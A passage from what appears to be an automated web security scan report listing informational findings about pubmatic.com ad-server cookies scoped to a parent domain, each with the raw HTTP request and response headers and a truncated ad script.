Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:18 GMT
Content-Length: 1567
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:17 GMT; path=/
Set-Cookie: pubfreq_27331_23101_419609244=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:18 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA9WgAAAAAAAAAA
...[SNIP]...

11.170. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=136&prevkadIds=22455_22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame32733027331&kltstamp=2011-8-17%201%3A7%3A7&ranreq=0.8784720080439001&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:05:41 GMT
Content-Length: 1765
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:05:41 GMT; path=/
Set-Cookie: pubfreq_27331_22455_11514573=973-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:45:41 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame32733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.171. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A21&ranreq=0.17113998159766197&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:55 GMT
Content-Length: 1858
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:55 GMT; path=/
Set-Cookie: pubfreq_27331_22455_910669727=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:55 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:55 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.172. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=136&prevkadIds=22455_22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame32733027331&kltstamp=2011-8-17%201%3A6%3A27&ranreq=0.43855415820144117&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38185087&rk1=62469548&rk2=1316239584.729&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PMDTSHR=cat:; DPPIX_ON=YES; SYNCUPPIX_ON=YES; USCC=ONE; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:05:01 GMT
Content-Length: 1766
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:05:01 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1623588958=973-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:45:01 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame32733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.173. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A42&ranreq=0.34033529623411596&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71499648&rk1=83196381&rk2=1316239662.087&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:16 GMT
Content-Length: 1833
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:16 GMT; path=/
Set-Cookie: _curtime=1316221576; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:16:16 GMT; path=/
Set-Cookie: pubfreq_27331_23103_438841735=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:16 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...

11.174. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A6%3A17&ranreq=0.6719533267896622&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=2703x172&adVisibility=2 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fentertainment%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:51 GMT
Content-Length: 1935
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:51 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1937773865=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:51 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:04:51 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.175. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=661&prevkadIds=22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A5%3A36&ranreq=0.5191648581530899&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71482072&rk1=45911150&rk2=1316239536.305&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:11 GMT
Content-Length: 1380
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:11 GMT; path=/
Set-Cookie: pubfreq_27331_22455_482022647=325-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:11 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.176. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=661&prevkadIds=22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A8%3A24&ranreq=0.6084608566015959&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:57 GMT
Content-Length: 1221
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:57 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1066863646=136-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:57 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.177. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bh.heraldinteractive.com/includes/processAds.bg&frameName=http_bh_heraldinteractive_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A55&ranreq=0.2872365918010473&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:29 GMT
Content-Length: 1877
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:29 GMT; path=/
Set-Cookie: pubfreq_27331_22455_832345834=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:29 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:07:29 GMT; path=/

document.write('<div id="http_bh_heraldinteractive_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " cli
...[SNIP]...

11.178. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
